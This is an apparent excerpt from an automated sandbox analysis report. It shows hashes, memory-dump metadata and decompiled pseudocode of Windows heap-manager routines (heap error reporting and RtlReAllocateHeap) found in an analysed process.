                                                                                                                              • Instruction Fuzzy Hash: 0931F175200303CFDF258A2899B4BA637B3AF52270F58827EDC594B266D735C8CAC642
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D782B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 23 1d782b2a-1d782b2f 24 1d782b3f-1d782b46 LdrInitializeThunk 23->24 25 1d782b31-1d782b38 23->25
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: a861b0d127d93636a516e8c32d03ed75f57857fefb3bbeefda64b446c59980b8
                                                                                                                              • Instruction ID: 1a7912a3d685969fa367acb5134771d72dfcd215b9dc1129b2ab878d7d2cb754
                                                                                                                              • Opcode Fuzzy Hash: a861b0d127d93636a516e8c32d03ed75f57857fefb3bbeefda64b446c59980b8
                                                                                                                              • Instruction Fuzzy Hash: C5B022328020C2CAEA00EB200B0CB0B3E002BC0322F22C0A2E20A0380F833CC080F233
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Non-executed Functions

                                                                                                                              Function 1D7FF82B Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 44%
                                                                                                                              			E1D7FF82B() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x1d7150b4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E1D73B910();
				} else {
					E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x1d83396c);
				E1D73B910("Heap error detected at %p (heap handle %p)\n",  *0x1d833970);
				_t27 =  *0x1d833968; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M1D7FFABB))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E1D73B910();
				} else {
					E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E1D73B910("Error code: %d - %s\n",  *0x1d833968);
				_t113 =  *0x1d833974; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E1D73B910();
					} else {
						E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1D73B910("Parameter1: %p\n",  *0x1d833974);
				}
				_t115 =  *0x1d833978; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E1D73B910();
					} else {
						E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1D73B910("Parameter2: %p\n",  *0x1d833978);
				}
				_t117 =  *0x1d83397c; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E1D73B910();
					} else {
						E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1D73B910("Parameter3: %p\n",  *0x1d83397c);
				}
				_t119 =  *0x1d833980; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E1D73B910();
					} else {
						E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x1d833984);
					E1D73B910("Last known valid blocks: before - %p, after - %p\n",  *0x1d833980);
				} else {
					_t120 =  *0x1d833984; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E1D73B910();
				} else {
					E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E1D73B910("Stack trace available at %p\n", 0x1d833990);
			}











                                                                                                                              0x1d7ff835
                                                                                                                              0x1d7ff83b
                                                                                                                              0x1d7ff843
                                                                                                                              0x1d7ff862
                                                                                                                              0x1d7ff863
                                                                                                                              0x1d7ff845
                                                                                                                              0x1d7ff85a
                                                                                                                              0x1d7ff85f
                                                                                                                              0x1d7ff869
                                                                                                                              0x1d7ff87a
                                                                                                                              0x1d7ff87f
                                                                                                                              0x1d7ff88a
                                                                                                                              0x1d7ff88c
                                                                                                                              0x00000000
                                                                                                                              0x1d7ff893
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7ff88c
                                                                                                                              0x1d7ff901
                                                                                                                              0x1d7ff90a
                                                                                                                              0x1d7ff929
                                                                                                                              0x1d7ff92a
                                                                                                                              0x1d7ff90c
                                                                                                                              0x1d7ff921
                                                                                                                              0x1d7ff926
                                                                                                                              0x1d7ff930
                                                                                                                              0x1d7ff93c
                                                                                                                              0x1d7ff944
                                                                                                                              0x1d7ff94a
                                                                                                                              0x1d7ff955
                                                                                                                              0x1d7ff974
                                                                                                                              0x1d7ff975
                                                                                                                              0x1d7ff957
                                                                                                                              0x1d7ff96c
                                                                                                                              0x1d7ff971
                                                                                                                              0x1d7ff986
                                                                                                                              0x1d7ff98c
                                                                                                                              0x1d7ff98d
                                                                                                                              0x1d7ff993
                                                                                                                              0x1d7ff99e
                                                                                                                              0x1d7ff9bd
                                                                                                                              0x1d7ff9be
                                                                                                                              0x1d7ff9a0
                                                                                                                              0x1d7ff9b5
                                                                                                                              0x1d7ff9ba
                                                                                                                              0x1d7ff9cf
                                                                                                                              0x1d7ff9d5
                                                                                                                              0x1d7ff9d6
                                                                                                                              0x1d7ff9dc
                                                                                                                              0x1d7ff9e7
                                                                                                                              0x1d7ffa06
                                                                                                                              0x1d7ffa07
                                                                                                                              0x1d7ff9e9
                                                                                                                              0x1d7ff9fe
                                                                                                                              0x1d7ffa03
                                                                                                                              0x1d7ffa18
                                                                                                                              0x1d7ffa1e
                                                                                                                              0x1d7ffa1f
                                                                                                                              0x1d7ffa25
                                                                                                                              0x1d7ffa2f
                                                                                                                              0x1d7ffa38
                                                                                                                              0x1d7ffa57
                                                                                                                              0x1d7ffa58
                                                                                                                              0x1d7ffa3a
                                                                                                                              0x1d7ffa4f
                                                                                                                              0x1d7ffa54
                                                                                                                              0x1d7ffa5e
                                                                                                                              0x1d7ffa6f
                                                                                                                              0x1d7ffa27
                                                                                                                              0x1d7ffa27
                                                                                                                              0x1d7ffa2d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7ffa2d
                                                                                                                              0x1d7ffa80
                                                                                                                              0x1d7ffa9f
                                                                                                                              0x1d7ffaa0
                                                                                                                              0x1d7ffa82
                                                                                                                              0x1d7ffa97
                                                                                                                              0x1d7ffa9c
                                                                                                                              0x1d7ffaba

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                                              • API String ID: 0-2897834094
                                                                                                                              • Opcode ID: c22bf9af4048077e8f23e20cdb64fe0bf29f080e89a159a66bbdd747b07291fc
                                                                                                                              • Instruction ID: 375f68612cc17b142dd515741c6196d4d92c8f9dfd3ac575202c30a3f598cb04
                                                                                                                              • Opcode Fuzzy Hash: c22bf9af4048077e8f23e20cdb64fe0bf29f080e89a159a66bbdd747b07291fc
                                                                                                                              • Instruction Fuzzy Hash: 5F61C83B419154FFC316DB54D988E34F3B4F745A36F0784A6E9149F323CA25AD948A83
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7EFDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 64%
                                                                                                                              			E1D7EFDF4(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t130;
				signed int _t132;
				intOrPtr _t138;
				intOrPtr _t139;
				signed int _t149;
				signed int _t150;
				intOrPtr _t151;
				signed int _t152;
				intOrPtr _t155;
				intOrPtr _t159;
				intOrPtr _t172;
				signed int _t173;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t183;
				void* _t184;
				signed char _t192;
				signed int _t193;
				intOrPtr _t195;
				intOrPtr _t199;
				signed int _t209;
				signed int _t226;
				signed char _t236;
				intOrPtr _t240;
				signed int* _t248;
				signed int _t253;
				signed int _t255;
				signed int _t267;
				signed int _t278;
				signed int* _t279;
				intOrPtr* _t283;
				void* _t284;
				void* _t286;

				_push(0x40);
				_push(0x1d81d430);
				E1D797BE4(__ebx, __edi, __esi);
				_t281 = __ecx;
				 *((intOrPtr*)(_t284 - 0x3c)) = __ecx;
				 *((char*)(_t284 - 0x19)) = 0;
				 *(_t284 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t284 - 4)) = 0;
					 *((intOrPtr*)(_t284 - 4)) = 1;
					_t130 = E1D737662("RtlReAllocateHeap");
					__eflags = _t130;
					if(_t130 == 0) {
						L72:
						 *(_t284 - 0x24) = 0;
						L73:
						 *((intOrPtr*)(_t284 - 4)) = 0;
						 *((intOrPtr*)(_t284 - 4)) = 0xfffffffe;
						E1D7F02E6(_t281);
						_t132 =  *(_t284 - 0x24);
						goto L75;
					}
					_t236 =  *(__ecx + 0x44) | __edx;
					 *(_t284 - 0x30) = _t236;
					 *(_t284 - 0x34) = _t236 | 0x10000100;
					__eflags =  *(_t284 + 0xc);
					if( *(_t284 + 0xc) == 0) {
						_t267 = 1;
						__eflags = 1;
					} else {
						_t267 =  *(_t284 + 0xc);
					}
					_t138 = ( *((intOrPtr*)(_t281 + 0x94)) + _t267 &  *(_t281 + 0x98)) + 8;
					 *((intOrPtr*)(_t284 - 0x40)) = _t138;
					__eflags = _t138 -  *(_t284 + 0xc);
					if(_t138 <  *(_t284 + 0xc)) {
						L68:
						_t139 =  *[fs:0x30];
						__eflags =  *(_t139 + 0xc);
						if( *(_t139 + 0xc) == 0) {
							_push("HEAP: ");
							E1D73B910();
						} else {
							E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t281 + 0x78)));
						E1D73B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t284 + 0xc));
						goto L72;
					}
					__eflags = _t138 -  *((intOrPtr*)(_t281 + 0x78));
					if(_t138 >  *((intOrPtr*)(_t281 + 0x78))) {
						goto L68;
					}
					 *(_t284 - 0x20) = 0;
					__eflags = _t236 & 0x00000001;
					if((_t236 & 0x00000001) == 0) {
						E1D74FED0( *((intOrPtr*)(_t281 + 0xc8)));
						 *((char*)(_t284 - 0x19)) = 1;
						_t226 =  *(_t284 - 0x30) | 0x10000101;
						__eflags = _t226;
						 *(_t284 - 0x34) = _t226;
					}
					E1D7F0835(_t281, 0);
					_t277 =  *((intOrPtr*)(_t284 + 8));
					_t269 = _t277 - 8;
					__eflags =  *((char*)(_t269 + 7)) - 5;
					if( *((char*)(_t269 + 7)) == 5) {
						_t269 = _t269 - (( *(_t269 + 6) & 0x000000ff) << 3);
						__eflags = _t269;
					}
					 *(_t284 - 0x2c) = _t269;
					 *(_t284 - 0x28) = _t269;
					_t240 = _t281;
					_t149 = E1D73753F(_t240, _t269, "RtlReAllocateHeap");
					__eflags = _t149;
					if(_t149 == 0) {
						L53:
						_t150 =  *(_t284 - 0x24);
						__eflags = _t150;
						if(_t150 == 0) {
							goto L73;
						}
						__eflags = _t150 -  *0x1d8347c8; // 0x0
						_t151 =  *[fs:0x30];
						if(__eflags != 0) {
							_t152 =  *(_t151 + 0x68);
							 *(_t284 - 0x48) = _t152;
							__eflags = _t152 & 0x00000800;
							if((_t152 & 0x00000800) == 0) {
								goto L73;
							}
							__eflags =  *(_t284 - 0x20) -  *0x1d8347cc; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1d8347ce; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							_t155 =  *[fs:0x30];
							__eflags =  *(_t155 + 0xc);
							if( *(_t155 + 0xc) == 0) {
								_push("HEAP: ");
								E1D73B910();
							} else {
								E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(E1D7E823A(_t281,  *(_t284 - 0x20)));
							_push( *(_t284 + 0xc));
							E1D73B910("Just reallocated block at %p to 0x%Ix bytes with tag %ws\n",  *(_t284 - 0x24));
							L59:
							_t159 =  *[fs:0x30];
							__eflags =  *((char*)(_t159 + 2));
							if( *((char*)(_t159 + 2)) != 0) {
								 *0x1d8347a1 = 1;
								 *0x1d834100 = 0;
								asm("int3");
								 *0x1d8347a1 = 0;
							}
							goto L73;
						}
						__eflags =  *(_t151 + 0xc);
						if( *(_t151 + 0xc) == 0) {
							_push("HEAP: ");
							E1D73B910();
						} else {
							E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E1D73B910("Just reallocated block at %p to %Ix bytes\n",  *0x1d8347c8);
						goto L59;
					} else {
						__eflags = _t277 -  *0x1d8347c8; // 0x0
						_t172 =  *[fs:0x30];
						if(__eflags != 0) {
							_t173 =  *(_t172 + 0x68);
							 *(_t284 - 0x44) = _t173;
							__eflags = _t173 & 0x00000800;
							if((_t173 & 0x00000800) == 0) {
								L38:
								_t174 = E1D752710(_t281,  *(_t284 - 0x34), _t277,  *(_t284 + 0xc));
								 *(_t284 - 0x24) = _t174;
								__eflags = _t174;
								if(_t174 != 0) {
									_t75 = _t174 - 8; // -8
									_t278 = _t75;
									__eflags =  *((char*)(_t278 + 7)) - 5;
									if( *((char*)(_t278 + 7)) == 5) {
										_t278 = _t278 - (( *(_t278 + 6) & 0x000000ff) << 3);
										__eflags = _t278;
									}
									_t248 = _t278;
									 *(_t284 - 0x28) = _t278;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *(_t278 + 3) - (_t248[0] ^ _t248[0] ^  *_t248);
										if(__eflags != 0) {
											_push(_t248);
											_t269 = _t278;
											E1D7FD646(0, _t281, _t278, _t278, _t281, __eflags);
										}
									}
									__eflags =  *(_t278 + 2) & 0x00000002;
									if(( *(_t278 + 2) & 0x00000002) == 0) {
										_t177 =  *(_t278 + 3);
										 *(_t284 - 0x1b) = _t177;
										_t178 = _t177 & 0x000000ff;
									} else {
										_t183 = E1D773AE9(_t278);
										 *(_t284 - 0x30) = _t183;
										__eflags =  *(_t281 + 0x40) & 0x08000000;
										if(( *(_t281 + 0x40) & 0x08000000) == 0) {
											 *_t183 = 0;
										} else {
											_t184 = E1D76FDB9(1, _t269);
											_t253 =  *(_t284 - 0x30);
											 *_t253 = _t184;
											_t183 = _t253;
										}
										_t178 =  *((intOrPtr*)(_t183 + 2));
									}
									 *(_t284 - 0x20) = _t178;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *(_t278 + 3) =  *(_t278 + 2) ^  *(_t278 + 1) ^  *_t278;
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *_t278;
									}
								}
								E1D7F0D24(_t281);
								__eflags = 0;
								E1D7F0835(_t281, 0);
								goto L53;
							}
							__eflags =  *0x1d8347cc;
							if( *0x1d8347cc == 0) {
								goto L38;
							}
							_t279 =  *(_t284 - 0x28);
							_t269 =  *(_t284 - 0x2c);
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags = _t279[0] - ( *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269);
								if(__eflags != 0) {
									_push(_t240);
									E1D7FD646(0, _t281, _t279, _t279, _t281, __eflags);
									_t269 =  *(_t284 - 0x2c);
								}
							}
							__eflags = _t279[0] & 0x00000002;
							if((_t279[0] & 0x00000002) == 0) {
								_t192 = _t279[0];
								 *(_t284 - 0x1a) = _t192;
								_t193 = _t192 & 0x000000ff;
							} else {
								_t209 = E1D773AE9(_t279);
								 *(_t284 - 0x30) = _t209;
								_t193 =  *(_t209 + 2) & 0x0000ffff;
							}
							_t255 = _t193;
							 *(_t284 - 0x20) = _t193;
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								_t279[0] =  *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269;
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags =  *_t279;
							}
							__eflags = _t255;
							if(_t255 == 0) {
								L37:
								_t277 =  *((intOrPtr*)(_t284 + 8));
							} else {
								__eflags = _t255 -  *0x1d8347cc; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1d8347ce; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								_t195 =  *[fs:0x30];
								__eflags =  *(_t195 + 0xc);
								if( *(_t195 + 0xc) == 0) {
									_push("HEAP: ");
									E1D73B910();
								} else {
									E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t269 =  *(_t284 - 0x20);
								_push(E1D7E823A(_t281,  *(_t284 - 0x20)));
								_push( *(_t284 + 0xc));
								_t277 =  *((intOrPtr*)(_t284 + 8));
								E1D73B910("About to rellocate block at %p to 0x%Ix bytes with tag %ws\n",  *((intOrPtr*)(_t284 + 8)));
								_t286 = _t286 + 0x10;
								L18:
								_t199 =  *[fs:0x30];
								__eflags =  *((char*)(_t199 + 2));
								if( *((char*)(_t199 + 2)) != 0) {
									 *0x1d8347a1 = 1;
									 *0x1d834100 = 0;
									asm("int3");
									 *0x1d8347a1 = 0;
								}
							}
							goto L38;
						}
						__eflags =  *(_t172 + 0xc);
						if( *(_t172 + 0xc) == 0) {
							_push("HEAP: ");
							E1D73B910();
						} else {
							E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E1D73B910("About to reallocate block at %p to %Ix bytes\n",  *0x1d8347c8);
						_t286 = _t286 + 0xc;
						goto L18;
					}
				} else {
					_t283 =  *0x1d83374c; // 0x0
					 *0x1d8391e0(__ecx, __edx,  *((intOrPtr*)(_t284 + 8)),  *(_t284 + 0xc));
					_t132 =  *_t283();
					L75:
					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0x10));
					return _t132;
				}
			}





































                                                                                                                              0x1d7efdf4
                                                                                                                              0x1d7efdf6
                                                                                                                              0x1d7efdfb
                                                                                                                              0x1d7efe02
                                                                                                                              0x1d7efe04
                                                                                                                              0x1d7efe09
                                                                                                                              0x1d7efe0c
                                                                                                                              0x1d7efe16
                                                                                                                              0x1d7efe35
                                                                                                                              0x1d7efe38
                                                                                                                              0x1d7efe46
                                                                                                                              0x1d7efe4b
                                                                                                                              0x1d7efe4d
                                                                                                                              0x1d7f0277
                                                                                                                              0x1d7f0277
                                                                                                                              0x1d7f027a
                                                                                                                              0x1d7f027a
                                                                                                                              0x1d7f02c2
                                                                                                                              0x1d7f02c9
                                                                                                                              0x1d7f02ce
                                                                                                                              0x00000000
                                                                                                                              0x1d7f02ce
                                                                                                                              0x1d7efe56
                                                                                                                              0x1d7efe58
                                                                                                                              0x1d7efe62
                                                                                                                              0x1d7efe65
                                                                                                                              0x1d7efe69
                                                                                                                              0x1d7efe72
                                                                                                                              0x1d7efe72
                                                                                                                              0x1d7efe6b
                                                                                                                              0x1d7efe6b
                                                                                                                              0x1d7efe6b
                                                                                                                              0x1d7efe81
                                                                                                                              0x1d7efe84
                                                                                                                              0x1d7efe87
                                                                                                                              0x1d7efe8a
                                                                                                                              0x1d7f0231
                                                                                                                              0x1d7f0231
                                                                                                                              0x1d7f0237
                                                                                                                              0x1d7f023a
                                                                                                                              0x1d7f0259
                                                                                                                              0x1d7f025e
                                                                                                                              0x1d7f023c
                                                                                                                              0x1d7f0251
                                                                                                                              0x1d7f0256
                                                                                                                              0x1d7f0264
                                                                                                                              0x1d7f026f
                                                                                                                              0x00000000
                                                                                                                              0x1d7f0274
                                                                                                                              0x1d7efe90
                                                                                                                              0x1d7efe93
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7efe9b
                                                                                                                              0x1d7efe9f
                                                                                                                              0x1d7efea2
                                                                                                                              0x1d7efeaa
                                                                                                                              0x1d7efeaf
                                                                                                                              0x1d7efeb6
                                                                                                                              0x1d7efeb6
                                                                                                                              0x1d7efebb
                                                                                                                              0x1d7efebb
                                                                                                                              0x1d7efec2
                                                                                                                              0x1d7efec7
                                                                                                                              0x1d7efeca
                                                                                                                              0x1d7efecd
                                                                                                                              0x1d7efed1
                                                                                                                              0x1d7efeda
                                                                                                                              0x1d7efeda
                                                                                                                              0x1d7efeda
                                                                                                                              0x1d7efedc
                                                                                                                              0x1d7efedf
                                                                                                                              0x1d7efee7
                                                                                                                              0x1d7efee9
                                                                                                                              0x1d7efeee
                                                                                                                              0x1d7efef0
                                                                                                                              0x1d7f0122
                                                                                                                              0x1d7f0122
                                                                                                                              0x1d7f0125
                                                                                                                              0x1d7f0127
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7f012d
                                                                                                                              0x1d7f0133
                                                                                                                              0x1d7f0139
                                                                                                                              0x1d7f01a7
                                                                                                                              0x1d7f01aa
                                                                                                                              0x1d7f01ad
                                                                                                                              0x1d7f01b2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7f01bc
                                                                                                                              0x1d7f01c3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7f01cd
                                                                                                                              0x1d7f01d4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7f01da
                                                                                                                              0x1d7f01e0
                                                                                                                              0x1d7f01e3
                                                                                                                              0x1d7f0202
                                                                                                                              0x1d7f0207
                                                                                                                              0x1d7f01e5
                                                                                                                              0x1d7f01fa
                                                                                                                              0x1d7f01ff
                                                                                                                              0x1d7f0218
                                                                                                                              0x1d7f0219
                                                                                                                              0x1d7f0224
                                                                                                                              0x1d7f017e
                                                                                                                              0x1d7f017e
                                                                                                                              0x1d7f0184
                                                                                                                              0x1d7f0188
                                                                                                                              0x1d7f018e
                                                                                                                              0x1d7f0195
                                                                                                                              0x1d7f019b
                                                                                                                              0x1d7f019c
                                                                                                                              0x1d7f019c
                                                                                                                              0x00000000
                                                                                                                              0x1d7f0188
                                                                                                                              0x1d7f013b
                                                                                                                              0x1d7f013e
                                                                                                                              0x1d7f015d
                                                                                                                              0x1d7f0162
                                                                                                                              0x1d7f0140
                                                                                                                              0x1d7f0155
                                                                                                                              0x1d7f015a
                                                                                                                              0x1d7f0168
                                                                                                                              0x1d7f0176
                                                                                                                              0x00000000
                                                                                                                              0x1d7efef6
                                                                                                                              0x1d7efef6
                                                                                                                              0x1d7efefc
                                                                                                                              0x1d7eff02
                                                                                                                              0x1d7eff70
                                                                                                                              0x1d7eff73
                                                                                                                              0x1d7eff76
                                                                                                                              0x1d7eff7b
                                                                                                                              0x1d7f0068
                                                                                                                              0x1d7f0070
                                                                                                                              0x1d7f0075
                                                                                                                              0x1d7f0078
                                                                                                                              0x1d7f007a
                                                                                                                              0x1d7f0080
                                                                                                                              0x1d7f0080
                                                                                                                              0x1d7f0083
                                                                                                                              0x1d7f0087
                                                                                                                              0x1d7f0090
                                                                                                                              0x1d7f0090
                                                                                                                              0x1d7f0090
                                                                                                                              0x1d7f0092
                                                                                                                              0x1d7f0094
                                                                                                                              0x1d7f0097
                                                                                                                              0x1d7f009a
                                                                                                                              0x1d7f009f
                                                                                                                              0x1d7f00a9
                                                                                                                              0x1d7f00ac
                                                                                                                              0x1d7f00ae
                                                                                                                              0x1d7f00af
                                                                                                                              0x1d7f00b3
                                                                                                                              0x1d7f00b3
                                                                                                                              0x1d7f00ac
                                                                                                                              0x1d7f00b8
                                                                                                                              0x1d7f00bc
                                                                                                                              0x1d7f00ec
                                                                                                                              0x1d7f00ef
                                                                                                                              0x1d7f00f2
                                                                                                                              0x1d7f00be
                                                                                                                              0x1d7f00c0
                                                                                                                              0x1d7f00c5
                                                                                                                              0x1d7f00ca
                                                                                                                              0x1d7f00d1
                                                                                                                              0x1d7f00e3
                                                                                                                              0x1d7f00d3
                                                                                                                              0x1d7f00d4
                                                                                                                              0x1d7f00d9
                                                                                                                              0x1d7f00dc
                                                                                                                              0x1d7f00df
                                                                                                                              0x1d7f00df
                                                                                                                              0x1d7f00e6
                                                                                                                              0x1d7f00e6
                                                                                                                              0x1d7f00f5
                                                                                                                              0x1d7f00f9
                                                                                                                              0x1d7f00fc
                                                                                                                              0x1d7f0108
                                                                                                                              0x1d7f010e
                                                                                                                              0x1d7f010e
                                                                                                                              0x1d7f010e
                                                                                                                              0x1d7f00fc
                                                                                                                              0x1d7f0114
                                                                                                                              0x1d7f0119
                                                                                                                              0x1d7f011d
                                                                                                                              0x00000000
                                                                                                                              0x1d7f011d
                                                                                                                              0x1d7eff81
                                                                                                                              0x1d7eff88
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7eff8e
                                                                                                                              0x1d7eff91
                                                                                                                              0x1d7eff94
                                                                                                                              0x1d7eff97
                                                                                                                              0x1d7eff9c
                                                                                                                              0x1d7effa6
                                                                                                                              0x1d7effa9
